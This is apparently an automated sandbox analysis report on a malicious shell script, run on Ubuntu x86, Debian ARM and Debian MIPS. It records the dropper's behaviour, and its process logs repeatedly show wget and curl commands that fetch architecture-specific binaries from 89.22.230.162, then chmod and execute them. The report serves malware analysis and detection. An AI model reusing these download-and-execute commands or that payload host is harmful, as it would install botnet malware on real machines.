Analysis Overview
SHA256
979ed6b90ceebe0bc4b8d4d4ac67f359d12fddf2fc5d837421a114f5db247093
Threat Level: Shows suspicious behavior
The file 513641f5f60d55559c2060489de6d605.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-24 01:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-24 01:19
Reported
2024-11-24 01:22
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
25s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/3AvA | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh | N/A |
Processes
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.x86]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]
/bin/cat
[cat UnHAnaAW.x86]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mips]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]
/bin/cat
[cat UnHAnaAW.mips]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]
/bin/cat
[cat UnHAnaAW.mpsl]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]
/bin/cat
[cat UnHAnaAW.arm4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm5]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]
/bin/cat
[cat UnHAnaAW.arm5]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm6]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]
/bin/cat
[cat UnHAnaAW.arm6]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm7]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]
/bin/cat
[cat UnHAnaAW.arm7]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.ppc]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]
/bin/cat
[cat UnHAnaAW.ppc]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.m68k]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]
/bin/cat
[cat UnHAnaAW.m68k]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.sh4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]
/bin/cat
[cat UnHAnaAW.sh4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 89.22.230.162:80 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| GB | 195.181.164.15:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-24 01:19
Reported
2024-11-24 01:22
Platform
debian9-armhf-20240611-en
Max time kernel
26s
Max time network
64s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh | N/A |
Processes
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.x86]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]
/bin/cat
[cat UnHAnaAW.x86]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mips]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]
/bin/cat
[cat UnHAnaAW.mips]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]
/bin/cat
[cat UnHAnaAW.mpsl]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]
/bin/cat
[cat UnHAnaAW.arm4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm5]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]
/bin/cat
[cat UnHAnaAW.arm5]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm6]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]
/bin/cat
[cat UnHAnaAW.arm6]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm7]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]
/bin/cat
[cat UnHAnaAW.arm7]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.ppc]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]
/bin/cat
[cat UnHAnaAW.ppc]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.m68k]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]
/bin/cat
[cat UnHAnaAW.m68k]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.sh4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]
/bin/cat
[cat UnHAnaAW.sh4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
Files
memory/818-1-0xb676f000-0xb6780044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-24 01:19
Reported
2024-11-24 01:22
Platform
debian9-mipsbe-20240611-en
Max time kernel
69s
Max time network
72s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh | N/A |
Processes
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.x86]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]
/bin/cat
[cat UnHAnaAW.x86]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mips]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]
/bin/cat
[cat UnHAnaAW.mips]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]
/bin/cat
[cat UnHAnaAW.mpsl]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]
/bin/cat
[cat UnHAnaAW.arm4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm5]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]
/bin/cat
[cat UnHAnaAW.arm5]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm6]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]
/bin/cat
[cat UnHAnaAW.arm6]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.arm7]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]
/bin/cat
[cat UnHAnaAW.arm7]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.ppc]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]
/bin/cat
[cat UnHAnaAW.ppc]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.m68k]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]
/bin/cat
[cat UnHAnaAW.m68k]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://89.22.230.162/bins/UnHAnaAW.sh4]
/usr/bin/curl
[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]
/bin/cat
[cat UnHAnaAW.sh4]
/bin/chmod
[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
| NL | 89.22.230.162:80 | | tcp |
